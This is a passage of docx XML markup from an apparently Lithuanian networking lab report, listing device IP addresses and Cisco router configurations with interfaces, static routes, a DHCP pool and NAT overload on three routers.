        <w:t>portal</w:t>
      </w:r>
      <w:r w:rsidR="2D34FCFD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="08EEC400" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="71E9ABB4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>testas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.lt- 192.168.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551569C" w14:textId="30BBD544" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puslapis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="062426A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>testas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.lt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC52279" w14:textId="47E45E16" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SW3 - 192.168.6.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FB42E" w14:textId="01DD4994" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1172C776" w14:textId="0A5D08DF" w:rsidR="000D2E64" w:rsidRPr="005A5C28" w:rsidRDefault="4FF86259" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serveris.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="13EC42CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Server0 – 213 210.1.3 255.255.255.0</w:t>
      </w:r>
      <w:r w:rsidR="7AD99D24" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DG – 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCFA1E" w14:textId="64244974" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAB6A4E" w14:textId="7AC2CA24" w:rsidR="4F2F0E94" w:rsidRPr="005A5C28" w:rsidRDefault="598D5B39" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mar</w:t>
      </w:r>
      <w:r w:rsidR="0FD26810" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rutizatorius</w:t>
      </w:r>
      <w:r w:rsidR="6DC3FAAF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1E8F8DB6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="44B6D649" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ro</w:t>
      </w:r>
      <w:r w:rsidR="44CC477B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ter0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9129EE" w14:textId="50EB1114" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229F5ADF" w14:textId="730F0916" w:rsidR="1ADF7F7B" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9A418" w14:textId="764D4453" w:rsidR="1ADF7F7B" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.10.2 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE8F8AB" w14:textId="3C513AB1" w:rsidR="1ADF7F7B" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0392F8" w14:textId="491B8E7C" w:rsidR="1ADF7F7B" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.5.1 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367552E7" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 0.0.0.0 0.0.0.0 192.168.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509FD88" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.2.0 255.255.255.0 192.168.5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AEDA12" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.3.0 255.255.255.0 192.168.5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B5641" w14:textId="3B4FFD22" w:rsidR="1ADF7F7B" w:rsidRPr="005A5C28" w:rsidRDefault="546A04C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.4.0 255.255.255.0 192.168.5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB80CD" w14:textId="2155AB9A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259901CE" w14:textId="57F68460" w:rsidR="1273A262" w:rsidRPr="005A5C28" w:rsidRDefault="389CA566" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maršrutizatorius 2.</w:t>
      </w:r>
      <w:r w:rsidR="216D9701" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ro</w:t>
      </w:r>
      <w:r w:rsidR="64BE69B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="216D9701" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ter2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D68BA" w14:textId="24814CCA" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1924BE09" w14:textId="28A39163" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip dhcp excluded-address 192.168.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804CD59" w14:textId="5D265B38" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip dhcp pool DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060296A6" w14:textId="3D00D835" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>network 192.168.6.0 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9706C" w14:textId="707A8DE8" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>default-router 192.168.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E60A17" w14:textId="28A39163" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dns-server 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFB20A" w14:textId="5A8A7968" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B067B" w14:textId="28A39163" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.10.6 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E7A50" w14:textId="76154CD3" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C2273" w14:textId="28A39163" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.6.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB258C" w14:textId="46455E27" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 0.0.0.0 0.0.0.0 192.168.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B949B" w14:textId="7D465E91" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63670D81" w14:textId="67C7BF0A" w:rsidR="3E4BCC65" w:rsidRPr="005A5C28" w:rsidRDefault="606B1932" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Maršrutizatorius 3. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F3E8A" w14:textId="3CEBD9A2" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F3AEA7" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0E40C" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.10.1 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC6A1A9" w14:textId="399E6858" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FDEE5" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A830271" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.10.5 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75085786" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ACAD83" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A790872" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 210.210.1.2 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163D62E9" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip nat outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281BA72" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip nat inside source list FOR-NAT interface GigabitEthernet0/2 overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06234D7E" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip classless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35609EFD" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.2.0 255.255.255.0 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F19E9" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
